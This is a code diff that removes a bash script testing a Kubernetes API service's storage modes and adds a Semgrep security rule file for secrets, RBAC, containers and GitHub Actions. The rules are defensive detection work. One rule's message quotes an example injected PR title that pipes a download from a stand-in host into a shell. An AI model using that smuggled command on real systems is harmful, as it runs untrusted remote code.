-    # Patch deployment to use external storage (must set command explicitly for args to work)
-    kubectl patch deployment maas-api -n "$NAMESPACE" --type='json' \
-        -p='[{"op":"add","path":"/spec/template/spec/containers/0/command","value":["./maas-api"]},{"op":"add","path":"/spec/template/spec/containers/0/args","value":["--storage=external"]},{"op":"add","path":"/spec/template/spec/containers/0/env/-","value":{"name":"DB_CONNECTION_URL","valueFrom":{"secretKeyRef":{"name":"database-config","key":"DB_CONNECTION_URL"}}}}]' >/dev/null 2>&1
-    kubectl rollout status deployment/maas-api -n "$NAMESPACE" --timeout=120s >/dev/null 2>&1
-    wait_for_api
-    ok "Deployed (PostgreSQL via CloudNativePG)"
-}
-
-create_api_key() {
-    local name="$1"
-    local token=$(get_token)
-    local response=$(curl -sSk \
-        -H "Authorization: Bearer $token" \
-        -H "Content-Type: application/json" \
-        -X POST \
-        -d "{\"name\": \"$name\", \"description\": \"Test key for $name\", \"expiration\": \"1h\"}" \
-        -w "\n%{http_code}" \
-        "${GATEWAY_URL}/maas-api/v1/api-keys")
-    local status=$(echo "$response" | tail -1)
-    local body=$(echo "$response" | sed '$d')
-    [ "$status" == "201" ] && echo "$body" && return 0
-    return 1
-}
-
-list_models() {
-    local api_key="$1"
-    local response=$(curl -sSk -H "Authorization: Bearer $api_key" -w "\n%{http_code}" "${GATEWAY_URL}/maas-api/v1/models")
-    local status=$(echo "$response" | tail -1)
-    [ "$status" == "200" ]
-}
-
-get_api_key() {
-    local jti="$1"
-    local token=$(get_token)
-    local response=$(curl -sSk -H "Authorization: Bearer $token" -w "\n%{http_code}" "${GATEWAY_URL}/maas-api/v1/api-keys/$jti")
-    local status=$(echo "$response" | tail -1)
-    local body=$(echo "$response" | sed '$d')
-    [ "$status" == "200" ] && echo "$body" && return 0
-    return 1
-}
-
-revoke_all_tokens() {
-    local token=$(get_token)
-    local response=$(curl -sSk -H "Authorization: Bearer $token" -X DELETE -w "\n%{http_code}" "${GATEWAY_URL}/maas-api/v1/tokens")
-    local status=$(echo "$response" | tail -1)
-    [ "$status" == "204" ]
-}
-
-restart_pod() {
-    local old_pod=$(kubectl get pods -n "$NAMESPACE" -l app.kubernetes.io/name=maas-api -o jsonpath='{.items[0].metadata.name}' 2>/dev/null)
-    kubectl delete pod "$old_pod" -n "$NAMESPACE" --wait=false >/dev/null 2>&1
-    
-    local waited=0
-    while [ $waited -lt 120 ]; do
-        local new_pod=$(kubectl get pods -n "$NAMESPACE" -l app.kubernetes.io/name=maas-api -o jsonpath='{.items[0].metadata.name}' 2>/dev/null || echo "")
-        if [ -n "$new_pod" ] && [ "$new_pod" != "$old_pod" ]; then
-            local ready=$(kubectl get pod "$new_pod" -n "$NAMESPACE" -o jsonpath='{.status.conditions[?(@.type=="Ready")].status}' 2>/dev/null || echo "")
-            if [ "$ready" == "True" ]; then
-                sleep 2
-                wait_for_api
-                return 0
-            fi
-        fi
-        sleep 2
-        waited=$((waited + 2))
-    done
-    return 1
-}
-
-run_storage_test() {
-    local mode="$1"
-    local expect_persist="$2"
-    local key_name="test-${mode}-$(date +%s)"
-    
-    step "Creating API Key with metadata..."
-    local key_response
-    key_response=$(create_api_key "$key_name")
-    if [ $? -ne 0 ] || [ -z "$key_response" ]; then
-        fail "Failed to create API key"
-        return 1
-    fi
-    
-    local api_token=$(echo "$key_response" | jq -r '.token // empty')
-    local jti=$(echo "$key_response" | jq -r '.jti // empty')
-    local name=$(echo "$key_response" | jq -r '.name // empty')
-    local desc=$(echo "$key_response" | jq -r '.description // empty')
-    
-    if [ -z "$api_token" ] || [ -z "$jti" ]; then
-        fail "Invalid API key response"
-        return 1
-    fi
-    
-    ok "Created: name='$name', jti='${jti:0:8}...'"
-    info "Description: '$desc'"
-    
-    step "Using API Key to list models..."
-    if list_models "$api_token"; then
-        ok "API Key is valid and working"
-    else
-        fail "API Key failed to authenticate"
-        return 1
-    fi
-    
-    step "Verifying metadata via GET /api-keys/:id..."
-    local get_response=$(get_api_key "$jti")
-    if [ $? -eq 0 ]; then
-        local status=$(echo "$get_response" | jq -r '.status')
-        ok "Metadata retrieved: status='$status'"
-    else
-        fail "Failed to retrieve metadata"
-        return 1
-    fi
-    
-    step "Restarting pod to test persistence..."
-    if restart_pod; then
-        ok "Pod restarted successfully"
-    else
-        fail "Pod restart failed"
-        return 1
-    fi
-    
-    step "Checking data after restart..."
-    local found=false
-    get_api_key "$jti" >/dev/null 2>&1 && found=true
-    
-    if [ "$expect_persist" == "true" ]; then
-        if [ "$found" == "true" ]; then
-            ok "Data PERSISTED after restart ✓"
-        else
-            fail "Data LOST after restart (expected to persist!)"
-            return 1
-        fi
-    else
-        if [ "$found" == "false" ]; then
-            ok "Data correctly LOST after restart (ephemeral mode)"
-        else
-            fail "Data unexpectedly persisted (should be ephemeral!)"
-            return 1
-        fi
-    fi
-    
-    if [ "$found" == "true" ] || [ "$expect_persist" == "false" ]; then
-        if [ "$found" == "false" ]; then
-            key_response=$(create_api_key "cleanup-key")
-        fi
-        
-        step "Revoking all tokens (DELETE /v1/tokens)..."
-        if revoke_all_tokens; then
-            ok "All tokens revoked"
-        else
-            fail "Failed to revoke tokens"
-            return 1
-        fi
-    fi
-    
-    return 0
-}
-
-main() {
-    banner "MaaS API Storage Modes Verification"
-    
-    echo -e "\n${W}Testing 3 storage modes:${NC}"
-    echo -e "  ${B}1.${NC} In-Memory (--storage=in-memory)  ${Y}(ephemeral - data lost on restart)${NC}"
-    echo -e "  ${B}2.${NC} Disk (--storage=disk)            ${G}(persistent - survives restart)${NC}"
-    echo -e "  ${B}3.${NC} External (--storage=external)    ${G}(persistent - survives restart)${NC}"
-    
-    discover_gateway
-    info "Gateway: $GATEWAY_URL"
-    info "Namespace: $NAMESPACE"
-    
-    local total_pass=0
-    local total_fail=0
-    
-    banner "Mode 1: In-Memory SQLite"
-    cleanup_all
-    deploy_in_memory
-    if run_storage_test "memory" "false"; then
-        ((total_pass++))
-        echo -e "\n${G}═══ In-Memory SQLite: PASS ═══${NC}"
-    else
-        ((total_fail++))
-        echo -e "\n${R}═══ In-Memory SQLite: FAIL ═══${NC}"
-    fi
-    
-    banner "Mode 2: Disk Storage"
-    cleanup_all
-    deploy_sqlite_pvc
-    if run_storage_test "disk" "true"; then
-        ((total_pass++))
-        echo -e "\n${G}═══ Disk Storage: PASS ═══${NC}"
-    else
-        ((total_fail++))
-        echo -e "\n${R}═══ Disk Storage: FAIL ═══${NC}"
-    fi
-    
-    banner "Mode 3: External Database"
-    cleanup_all
-    deploy_postgresql
-    if run_storage_test "external" "true"; then
-        ((total_pass++))
-        echo -e "\n${G}═══ External Database: PASS ═══${NC}"
-    else
-        ((total_fail++))
-        echo -e "\n${R}═══ External Database: FAIL ═══${NC}"
-    fi
-    
-    banner "Verification Complete"
-    
-    echo ""
-    echo -e "${W}Results:${NC}"
-    echo -e "  ${G}Passed: $total_pass${NC}"
-    echo -e "  ${R}Failed: $total_fail${NC}"
-    echo ""
-    
-    if [ $total_fail -eq 0 ]; then
-        echo -e "${G}╔══════════════════════════════════════════════════════════════════╗${NC}"
-        echo -e "${G}║  All 3 storage modes working correctly!                          ║${NC}"
-        echo -e "${G}╚══════════════════════════════════════════════════════════════════╝${NC}"
-        return 0
-    else
-        echo -e "${R}╔══════════════════════════════════════════════════════════════════╗${NC}"
-        echo -e "${R}║  Some tests failed - check output above                          ║${NC}"
-        echo -e "${R}╚══════════════════════════════════════════════════════════════════╝${NC}"
-        return 1
-    fi
-}
-
-main "$@"
-
diff --git a/semgrep.yaml b/semgrep.yaml
new file mode 100644
index 000000000..516925627
--- /dev/null
+++ b/semgrep.yaml
@@ -0,0 +1,1873 @@
+# Unified Semgrep Security Rules
+# Template Version: 3.0.0
+# Generated by security-findings-manager plugin
+#
+# This is a single unified configuration covering all supported languages:
+#   - Go (Kubernetes controllers and operators)
+#   - Python (ML/Data Science services and pipelines)
+#   - TypeScript / JavaScript (React frontends)
+#   - YAML (Kubernetes manifests, GitHub Actions workflows)
+#   - Generic patterns (secrets detection across all file types)
+#
+# Semgrep automatically skips rules whose language is not present in the
+# scanned repository, so it is safe to include all rules in every repo.
+#
+# Deduplicated from per-language templates:
+#   semgrep-kubernetes-operator.yaml, semgrep-python.yaml,
+#   semgrep-typescript.yaml, semgrep-generic.yaml
+
+rules:
+  # ==========================================================================
+  # SECTION 1: GENERIC SECRETS DETECTION — Applies to all file types
+  # ==========================================================================
+
+  - id: generic-hardcoded-secret
+    languages: [generic]
+    severity: ERROR
+    message: |
+      Potential hardcoded secret detected (CWE-798).
+
+      Pattern matches: password, passwd, pwd, secret, token, api_key, apikey, private_key
+
+      Security Risk: Credentials in source code are visible in:
+        - Git history (even if deleted later)
+        - Container images
+        - CI/CD logs
+        - Backup systems
+
+      Remediation: Use environment variables or secret management:
+        - Kubernetes: Use Secrets or SealedSecrets
+        - GitHub Actions: Use repository/organization secrets
+        - Local development: Use .env files (add to .gitignore)
+
+      If this is a test fixture or example:
+        - Add comment: # nosemgrep: generic-hardcoded-secret
+        - Or use obviously fake values: password = "FAKE"
+    patterns:
+      - pattern-regex: |-
+          (?i)(password|passwd|pwd|secret|token|api[_-]?key|private[_-]?key)\s*[:=]+\s*["'][^"']{8,}["']
+    metadata:
+      cwe: "CWE-798"
+      owasp: "A07:2021 - Identification and Authentication Failures"
+      category: "security"
+
+  - id: generic-aws-access-key
+    languages: [generic]
+    severity: ERROR
+    message: |
+      AWS Access Key ID detected (AKIA...).
+
+      Format: AKIA[0-9A-Z]{16}
+
+      Immediate Action:
+        1. Rotate this key in AWS IAM console immediately
+        2. Check CloudTrail for unauthorized access
+        3. Revoke any sessions using this key
+
+      Prevention:
+        - Use IAM roles for EC2/ECS/Lambda (no keys needed)
+        - Use IAM roles for service accounts (IRSA) in Kubernetes
+        - Store keys in AWS Secrets Manager or SSM Parameter Store
+        - Enable AWS CloudTrail for key usage monitoring
+
+      False Positive: If this is documentation/example, replace with:
+        AKIA...EXAMPLE (redacted AWS example key)
+    pattern-regex: 'AKIA[0-9A-Z]{16}'
+    metadata:
+      cwe: "CWE-798"
+      category: "security"
+
+  - id: generic-aws-secret-access-key
+    languages: [generic]
+    severity: ERROR
+    message: |
+      AWS Secret Access Key detected.
+
+      Pattern: 40-character base64 string (often paired with AKIA... access key)
+
+      Immediate Action: Rotate both access key and secret key immediately.
+
+      Note: This may have false positives for other base64 strings.
+    pattern-regex: |-
+      (?i)(aws_secret_access_key|aws[_-]?secret)\s*[:=]\s*["'][A-Za-z0-9/+=]{40}["']
+    metadata:
+      cwe: "CWE-798"
+      category: "security"
+
+  - id: generic-private-key
+    languages: [generic]
+    severity: ERROR
+    message: |
+      Private key detected in code.
+
+      Security Risk: Private keys in source code compromise PKI security:
+        - SSL/TLS certificates (MITM attacks possible)
+        - SSH keys (unauthorized server access)
+        - Code signing certificates (malware distribution)
+
+      Remediation:
+        - Remove from code immediately
+        - Revoke and regenerate keypair
+        - Use Kubernetes TLS secrets or cert-manager for certificates
+        - Use SSH agent or credential managers for SSH keys
+
+      If this is documentation or a test fixture, consider suppressing the finding.
+    pattern-regex: '-----BEGIN (RSA|DSA|EC|OPENSSH|PGP) PRIVATE KEY-----'
+    metadata:
+      cwe: "CWE-798"
+      category: "security"
+
+  - id: generic-github-token
+    languages: [generic]
+    severity: ERROR
+    message: |
+      GitHub Personal Access Token detected.
+
+      Format: ghp_[A-Za-z0-9]{36} (classic) or github_pat_[A-Za-z0-9_]+ (fine-grained)
+
+      Immediate Action:
+        1. Revoke token at https://github.com/settings/tokens
+        2. Check audit log for unauthorized access
+        3. Rotate all tokens with same permissions
+
+      Prevention:
+        - Use GitHub Apps instead of PATs (scoped permissions, audit trail)
+        - Use GITHUB_TOKEN in Actions (automatic, scoped to workflow)
+        - Set token expiration (max 90 days)
+    pattern-regex: '(ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]+)'
+    metadata:
+      cwe: "CWE-798"
+      category: "security"
+
+  - id: generic-slack-webhook
+    languages: [generic]
+    severity: ERROR
+    message: |
+      Slack Webhook URL detected.
+
+      Format: https://hooks.slack.com/services/T.../B.../...
+
+      Security Risk: Webhook URL allows posting to Slack channel (spam, phishing).
+
+      Remediation: Regenerate webhook in Slack workspace settings.
+    pattern-regex: 'https://hooks\.slack\.com/services/T[A-Z0-9]+/B[A-Z0-9]+/[A-Za-z0-9]+'
+    metadata:
+      cwe: "CWE-798"
+      category: "security"
+
+  - id: generic-google-api-key
+    languages: [generic]
+    severity: ERROR
+    message: |
+      Google API Key detected.
+
+      Format: AIza[A-Za-z0-9_-]{35}
+
+      Immediate Action:
+        1. Revoke key in Google Cloud Console
+        2. Check usage logs for unauthorized requests
+        3. Rotate all API keys
+
+      Prevention: Use service accounts with IAM instead of API keys.
+    pattern-regex: 'AIza[A-Za-z0-9_-]{35}'
+    metadata:
+      cwe: "CWE-798"
+      category: "security"
+
+  # ==========================================================================
+  # SECTION 2: KUBERNETES RBAC SECURITY — Privilege Escalation Prevention
+  # ==========================================================================
+
+  - id: k8s-rbac-wildcard-resources
+    languages: [yaml]
+    severity: ERROR
+    message: |
+      RBAC rule allows wildcard resources ["*"] - enables privilege escalation (CWE-269).
+
+      Attack Vector: A compromised pod with this ClusterRole can access ALL resource types
+      including Secrets, which may contain credentials for further lateral movement.
+
+      Remediation: Use specific resource names:
+        resources: ["pods", "services", "configmaps", "deployments"]
+
+      References:
+        - CWE-269: Improper Privilege Management
+        - OWASP A01:2021 - Broken Access Control
+    patterns:
+      - pattern: |
+          resources:
+            - "*"
+      - pattern-inside: |
+          kind: ClusterRole
+          ...
+      - pattern-not-inside: |
+          # Exclude test fixtures
+          metadata:
+            namespace: test
+    metadata:
+      cwe: "CWE-269"
+      owasp: "A01:2021"
+      category: "security"
+
+  - id: k8s-rbac-wildcard-verbs
+    languages: [yaml]
+    severity: ERROR
+    message: |
+      RBAC rule allows wildcard verbs ["*"] - enables privilege escalation (CWE-269).
+
+      Attack Vector: Grants all permissions (get, list, create, update, patch, delete, deletecollection).
+      A compromised pod can delete critical resources or modify RBAC rules to escalate privileges.
+
+      Remediation: Use specific verbs based on least privilege:
+        verbs: ["get", "list", "watch"]  # Read-only
+        verbs: ["create", "update"]      # Write permissions
+
+      Never allow: ["escalate", "impersonate", "bind"] - these enable direct privilege escalation.
+    patterns:
+      - pattern: |
+          verbs:
+            - "*"
+      - pattern-inside: |
+          kind: ClusterRole
+          ...
+    metadata:
+      cwe: "CWE-269"
+      owasp: "A01:2021"
+      category: "security"
+
+  - id: k8s-rbac-dangerous-verbs
+    languages: [yaml]
+    severity: ERROR
+    message: |
+      RBAC rule contains dangerous verbs that enable privilege escalation.
+
+      Dangerous verbs:
+        - "escalate": Allows modifying RBAC rules to grant higher privileges
+        - "impersonate": Allows acting as other users/service accounts
+        - "bind": Allows binding ClusterRoles without owning all permissions
+
+      Remediation: Remove dangerous verbs. Use specific permissions instead.
+    pattern-either:
+      - pattern: |
+          verbs:
+            - ...
+            - "escalate"
+            - ...
+      - pattern: |
+          verbs:
+            - ...
+            - "impersonate"
+            - ...
+      - pattern: |
+          verbs:
+            - ...
+            - "bind"
+            - ...
+    metadata:
+      cwe: "CWE-269"
+      category: "security"
+
+  - id: k8s-rbac-cluster-admin-binding
+    languages: [yaml]
+    severity: WARNING
+    message: |
+      Binding to cluster-admin detected (CWE-269).
+
+      The cluster-admin ClusterRole grants unrestricted access to ALL resources in ALL namespaces.
+      This is almost never needed for application workloads.
+
+      Remediation: Create a custom ClusterRole with least-privilege permissions:
+        kind: ClusterRole
+        rules:
+          - apiGroups: [""]
+            resources: ["pods"]
+            verbs: ["get", "list", "watch"]
+    patterns:
+      - pattern: |
+          roleRef:
+            name: cluster-admin
+            ...
+    metadata:
+      cwe: "CWE-269"
+      category: "security"
+
+  - id: k8s-rbac-broad-subject
+    languages: [yaml]
+    severity: ERROR
+    message: |
+      RBAC binding to system:authenticated or system:unauthenticated (CWE-269).
+
+      These groups include ALL authenticated/unauthenticated users in the cluster.
+      Binding to these grants access to every user, including service accounts
+      from all namespaces.
+
+      Remediation: Bind to specific ServiceAccounts, Users, or Groups instead.
+    patterns:
+      - pattern-either:
+          - pattern: |
+              subjects:
+                - kind: Group
+                  name: system:authenticated
+          - pattern: |
+              subjects:
+                - kind: Group
+                  name: system:unauthenticated
+    metadata:
+      cwe: "CWE-269"
+      category: "security"
+
+  - id: k8s-rbac-create-persistentvolumes
+    languages: [yaml]
+    severity: WARNING
+    message: |
+      Permission to create PersistentVolumes can enable host-level privilege escalation (CWE-269).
+
+      A ClusterRole with create access to PersistentVolumes can provision hostPath PVs,
+      allowing pods to mount arbitrary host directories.
+
+      Remediation: Restrict PV creation to cluster administrators only.
+      Use PersistentVolumeClaims for application workloads.
+    patterns:
+      - pattern: |
+          kind: ClusterRole
+          ...
+          rules:
+            - ...
+              resources:
+                - persistentvolumes
+              ...
+              verbs:
+                - create
+    metadata:
+      cwe: "CWE-269"
+      category: "security"
+
+  - id: k8s-rbac-aggregated-clusterrole
+    languages: [yaml]
+    severity: INFO
+    message: |
+      Aggregated ClusterRole detected.
+
+      Review aggregation selectors carefully to prevent unintended permission grants.
+      Aggregated roles can accumulate unexpected permissions if selectors are too broad.
+    patterns:
+      - pattern: |
+          aggregationRule:
+            ...
+      - pattern-inside: |
+          kind: ClusterRole
+          ...
+    metadata:
+      category: "security"
+      note: "Not necessarily dangerous, but aggregated roles can accumulate unexpected permissions if selectors are too broad"
+
+  - id: k8s-rbac-secrets-cluster-access
+    languages: [yaml]
+    severity: WARNING
+    message: |
+      ClusterRole grants secret access (get/list/watch) across all namespaces (CWE-200).
+
+      Secrets may contain credentials, TLS certificates, and other sensitive data.
+      Cluster-wide access allows reading secrets from all namespaces.
+
+      Remediation: Use namespace-scoped Role instead of ClusterRole for secrets access
+      unless cross-namespace access is explicitly required.
+    patterns:
+      - pattern: |
+          resources:
+            - secrets
+      - pattern-either:
+          - pattern-inside: |
+              kind: ClusterRole
+              ...
+              rules:
+                - verbs:
+                    - get
+          - pattern-inside: |
+              kind: ClusterRole
+              ...
+              rules:
+                - verbs:
+                    - list
+          - pattern-inside: |
+              kind: ClusterRole
+              ...
+              rules:
+                - verbs:
+                    - watch
+    metadata:
+      cwe: "CWE-200"
+      category: "security"
+
+  - id: k8s-rolebinding-references-clusterrole
+    languages: [yaml]
+    severity: WARNING
+    message: |
+      RoleBinding references a ClusterRole (CWE-269).
+
+      While this is a valid Kubernetes pattern for namespace-scoping cluster-level
+      permissions, it deserves review to ensure the referenced ClusterRole does not
+      grant more permissions than intended for this namespace.
+
+      Remediation: Verify the referenced ClusterRole has appropriate permissions.
+      Consider creating a namespace-scoped Role if only specific permissions are needed.
+    patterns:
+      - pattern: |
+          kind: RoleBinding
+          ...
+          roleRef:
+            kind: ClusterRole
+            ...
+    metadata:
+      cwe: "CWE-269"
+      category: "security"
+
+  # ==========================================================================
+  # SECTION 3: KUBERNETES CONTAINER SECURITY
+  # ==========================================================================
+
+  - id: k8s-privileged-container
+    languages: [yaml]
+    severity: ERROR
+    message: |
+      Container runs in privileged mode - allows host access (CWE-250).
+
+      Attack Vector: Privileged containers can access host devices, mount host filesystems,
+      and bypass all Linux security modules (SELinux, AppArmor). This enables container escape.
+
+      Remediation: Remove "privileged: true". Use specific capabilities if needed:
+        securityContext:
+          capabilities:
+            add: ["NET_ADMIN"]  # Only grant specific capabilities
+    pattern: |
+      securityContext:
+        ...
+        privileged: true
+        ...
+    metadata:
+      cwe: "CWE-250"
+      owasp: "A01:2021"
+      category: "security"
+
+  - id: k8s-missing-security-context-runAsNonRoot
+    languages: [yaml]
+    severity: WARNING
+    message: |
+      Pod/Container missing securityContext.runAsNonRoot.
+
+      Best Practice: Containers should not run as root (UID 0) to limit impact of container escape.
+
+      Remediation: Add to pod or container spec:
+        securityContext:
+          runAsNonRoot: true
+          runAsUser: 1000  # Non-root UID
+    patterns:
+      - pattern-inside: |
+          kind: $KIND
+          ...
+      - metavariable-regex:
+          metavariable: $KIND
+          regex: ^(Deployment|StatefulSet|DaemonSet|Pod)$
+      - pattern-not: |
+          securityContext:
+            ...
+            runAsNonRoot: true
+            ...
+    metadata:
+      category: "security"
+      severity: "warning"
+
+  - id: k8s-hostpath-mount
+    languages: [yaml]
+    severity: ERROR
+    message: |
+      Container mounts hostPath volume - allows host filesystem access (CWE-653).
+
+      Attack Vector: hostPath mounts bypass container isolation. A compromised pod can
+      read/write host files including /etc/shadow, SSH keys, or Kubernetes secrets.
+
+      Remediation: Use PersistentVolumeClaims, ConfigMaps, or Secrets instead.
+      If hostPath is absolutely necessary (e.g., DaemonSet for node monitoring),
+      mount as readOnly and restrict to specific paths.
+    pattern: |
+      volumes:
+        - name: $NAME
+          hostPath:
+            path: $PATH
+    metadata:
+      cwe: "CWE-653"
+      category: "security"
+
+  - id: k8s-secret-in-configmap
+    languages: [yaml]
+    severity: ERROR
+    message: |
+      Secret value stored in ConfigMap instead of Secret.
+
+      Security Risk: ConfigMaps are not designed for sensitive data:
+        - Not encrypted at rest by default
+        - Visible in kubectl get configmap -o yaml
+        - No audit logging for access
+        - May be logged by monitoring tools
+
+      Remediation: Use Secret instead:
+        apiVersion: v1
+        kind: Secret
+        metadata:
+          name: my-secret
+        type: Opaque
+        data:
+          password: <base64-encoded-value>
+
+      Or use external secret management: SealedSecrets, external-secrets, Vault.
+    patterns:
+      - pattern-either:
+          - pattern: |
+              kind: ConfigMap
+              ...
+              data:
+                password: $VALUE
+          - pattern: |
+              kind: ConfigMap
+              ...
+              data:
+                token: $VALUE
+          - pattern: |
+              kind: ConfigMap
+              ...
+              data:
+                apiKey: $VALUE
+    metadata:
+      cwe: "CWE-522"
+      category: "security"
+
+  - id: yaml-hardcoded-secret
+    languages: [yaml]
+    severity: WARNING
+    message: |
+      Potential hardcoded secret in YAML file.
+
+      Keys matching: password, passwd, secret, token, apiKey, privateKey
+
+      Remediation: Move secrets to environment variables or secret management.
+    pattern-regex: |-
+      (?i)^[[:space:]]*(password|passwd|secret|token|api[_-]?key|private[_-]?key):[[:space:]]*["']?[^"'\s]{8,}
+    metadata:
+      cwe: "CWE-798"
+      category: "security"
+
+  - id: k8s-pod-automount-token
+    languages: [yaml]
+    severity: WARNING
+    message: |
+      Workload explicitly enables automountServiceAccountToken (CWE-200).
+
+      When enabled, the ServiceAccount token is mounted into the pod at
+      /var/run/secrets/kubernetes.io/serviceaccount/token. If the pod is
+      compromised, the attacker can use this token to access the Kubernetes API.
+
+      Remediation: Set automountServiceAccountToken: false if the pod doesn't
+      need Kubernetes API access (most application pods don't).
+    pattern-either:
+      # Match Pod directly
+      - patterns:
+          - pattern: |
+              automountServiceAccountToken: true
+          - pattern-inside: |
+              kind: Pod
+              ...
+      # Match Deployment, StatefulSet, DaemonSet, ReplicaSet pod template
+      - patterns:
+          - pattern: |
+              automountServiceAccountToken: true
+          - pattern-inside: |
+              kind: $KIND
+              ...
+              spec:
+                ...
+                template:
+                  ...
+          - metavariable-regex:
+              metavariable: $KIND
+              regex: (Deployment|StatefulSet|DaemonSet|ReplicaSet)
+      # Match Job pod template
+      - patterns:
+          - pattern: |
+              automountServiceAccountToken: true
+          - pattern-inside: |
+              kind: Job
+              ...
+              spec:
+                ...
+                template:
+                  ...
+      # Match CronJob pod template (nested under jobTemplate)
+      - patterns:
+          - pattern: |
+              automountServiceAccountToken: true
+          - pattern-inside: |
+              kind: CronJob
+              ...
+              spec:
+                ...
+                jobTemplate:
+                  ...
+                  spec:
+                    ...
+                    template:
+                      ...
+    metadata:
+      cwe: "CWE-200"
+      category: "security"
+
+  - id: k8s-pod-default-serviceaccount
+    languages: [yaml]
+    severity: WARNING
+    message: |
+      Workload uses default ServiceAccount (CWE-250).
+
+      The default ServiceAccount may have more permissions than needed.
+      Each workload should use a dedicated ServiceAccount with minimal RBAC
+      permissions following the principle of least privilege.
+
+      Remediation: Create a dedicated ServiceAccount:
+        apiVersion: v1
+        kind: ServiceAccount
+        metadata:
+          name: my-app-sa
+    pattern-either:
+      # Match Pod directly — explicit default
+      - pattern: |
+          kind: Pod
+          ...
+          spec:
+            ...
+            serviceAccountName: default
+      # Match Pod directly — no SA specified
+      - patterns:
+          - pattern: |
+              kind: Pod
+              ...
+              spec:
+                ...
+          - pattern-not: |
+              serviceAccountName: $SA
+      # Match controllers — explicit default
+      - patterns:
+          - pattern: |
+              spec:
+                ...
+                template:
+                  ...
+                  spec:
+                    ...
+                    serviceAccountName: default
+          - pattern-inside: |
+              kind: $KIND
+              ...
+          - metavariable-regex:
+              metavariable: $KIND
+              regex: (Deployment|StatefulSet|DaemonSet|ReplicaSet|Job)
+      # Match controllers — no SA specified (implicit default)
+      - patterns:
+          - pattern: |
+              spec:
+                ...
+                template:
+                  ...
+                  spec:
+                    ...
+          - pattern-not: |
+              spec:
+                ...
+                template:
+                  ...
+                  spec:
+                    ...
+                    serviceAccountName: $SA
+          - pattern-inside: |
+              kind: $KIND
+              ...
+          - metavariable-regex:
+              metavariable: $KIND
+              regex: (Deployment|StatefulSet|DaemonSet|ReplicaSet|Job)
+      # Match CronJob — explicit default
+      - patterns:
+          - pattern: |
+              spec:
+                ...
+                jobTemplate:
+                  ...
+                  spec:
+                    ...
+                    template:
+                      ...
+                      spec:
+                        ...
+                        serviceAccountName: default
+          - pattern-inside: |
+              kind: CronJob
+              ...
+      # Match CronJob — no SA specified (implicit default)
+      - patterns:
+          - pattern: |
+              spec:
+                ...
+                jobTemplate:
+                  ...
+                  spec:
+                    ...
+                    template:
+                      ...
+                      spec:
+                        ...
+          - pattern-not: |
+              spec:
+                ...
+                jobTemplate:
+                  ...
+                  spec:
+                    ...
+                    template:
+                      ...
+                      spec:
+                        ...
+                        serviceAccountName: $SA
+          - pattern-inside: |
+              kind: CronJob
+              ...
+    metadata:
+      cwe: "CWE-250"
+      category: "security"
+
+  # ==========================================================================
+  # SECTION 4: GITHUB ACTIONS SECURITY — Workflow files
+  # ==========================================================================
+
+  - id: github-actions-hardcoded-secret
+    languages: [yaml]
+    severity: ERROR
+    message: |
+      Hardcoded secret in GitHub Actions workflow.
+
+      Security Risk: Secrets in workflows are visible in git history and to all collaborators.
+
+      Remediation: Use GitHub Secrets:
+        env:
+          API_KEY: ${{ secrets.API_KEY }}
+
+      Add secret at: Repository Settings > Secrets and variables > Actions > New repository secret
+    patterns:
+      - pattern-either:
+          - pattern: |
+              env:
+                $KEY: $VALUE
+          - pattern: |
+              with:
+                $KEY: $VALUE
+      - metavariable-regex:
+          metavariable: $KEY
+          regex: (?i)(password|passwd|token|api[_-]?key|secret)
+      - metavariable-pattern:
+          metavariable: $VALUE
+          patterns:
+            - pattern-not: ${{ secrets.$SECRET }}
+            - pattern-not: ${{ env.$ENV }}
+    paths:
+      include:
+        - "**/.github/workflows/*.yml"
+        - "**/.github/workflows/*.yaml"
+    metadata:
+      cwe: "CWE-798"
+      category: "security"
+
+  - id: github-actions-script-injection
+    languages: [generic]
+    severity: ERROR
+    message: |
+      GitHub Actions expression injection in workflow run block (CWE-78).
+
+      Attack Vector: Attacker-controlled values from PR titles, issue bodies, branch names,
+      or commit messages are interpolated directly into shell commands:
+        run: echo "${{ github.event.pull_request.title }}"
+        # PR title: "; curl evil.com | sh"
+
+      Dangerous fields (attacker-controlled text):
+        - github.event.issue.title / body
+        - github.event.pull_request.title / body / head.ref
+        - github.event.comment.body
+        - github.event.review.body
+        - github.event.discussion.title / body
+        - github.event.head_commit.message
+        - github.head_ref
+
+      Safe fields (constrained values - do not flag):
+        - github.event.number, github.event.action, github.sha, github.actor
+
+      Remediation: Move to environment variable (shell handles escaping):
+        - name: Process PR
+          run: echo "$TITLE"
+          env:
+            TITLE: ${{ github.event.pull_request.title }}
+    patterns:
+      - pattern-regex: 'run:\s*(?:[|>][-+]?\n(?:[ \t]+[^\n]*\n)*|[^\n]*)\$\{\{\s*github\.(head_ref|event\.(issue|pull_request|discussion|review|review_comment|comment)\.(title|body|head\.ref|head\.label)|event\.head_commit\.message|event\.commits\[\d+\]\.message)\s*\}\}'
+    paths:
+      include:
+        - "**/.github/workflows/*.yml"
+        - "**/.github/workflows/*.yaml"
+    metadata:
+      cwe: "CWE-78"
+      owasp: "A03:2021 - Injection"
+      category: "security"
+      references:
+        - "https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections"
+
+  - id: github-actions-pull-request-target-checkout
+    languages: [generic]
+    severity: WARNING
+    message: |
+      Unsafe checkout in pull_request_target workflow (CWE-829).
+
+      Attack Vector: pull_request_target runs with WRITE token and access to secrets.
+      If the workflow checks out the PR head code, a malicious PR can:
+        1. Modify build scripts to steal secrets
+        2. Push malicious code with write permissions
+        3. Execute arbitrary commands with elevated privileges
+
+      Unsafe patterns (flag these):
+        ref: ${{ github.event.pull_request.head.sha }}
+        ref: ${{ github.event.pull_request.head.ref }}
+
+      Safe patterns (do not flag):
+        - No ref specified (defaults to base branch)
+        - ref: refs/pull/${{ github.event.number }}/merge
+        - ref: ${{ github.event.pull_request.base.sha }}
+
+      Remediation:
+        - Use artifact passing between workflows instead of direct checkout
+        - If checkout is needed, use merge commit: refs/pull/${{ github.event.number }}/merge
+        - Add persist-credentials: false to limit token scope
+    patterns:
+      - pattern-regex: 'pull_request_target[\s\S]*?uses:\s*actions/checkout@[^\n]*\n(\s+[\w-]+:.*\n)*\s+ref:\s*\$\{\{[^\}]*pull_request\.head\.(sha|ref)\s*\}\}'
+    paths:
+      include:
+        - "**/.github/workflows/*.yml"
+        - "**/.github/workflows/*.yaml"
+    metadata:
+      cwe: "CWE-829"
+      category: "security"
+      references:
+        - "https://securitylab.github.com/research/github-actions-preventing-pwn-requests/"
+
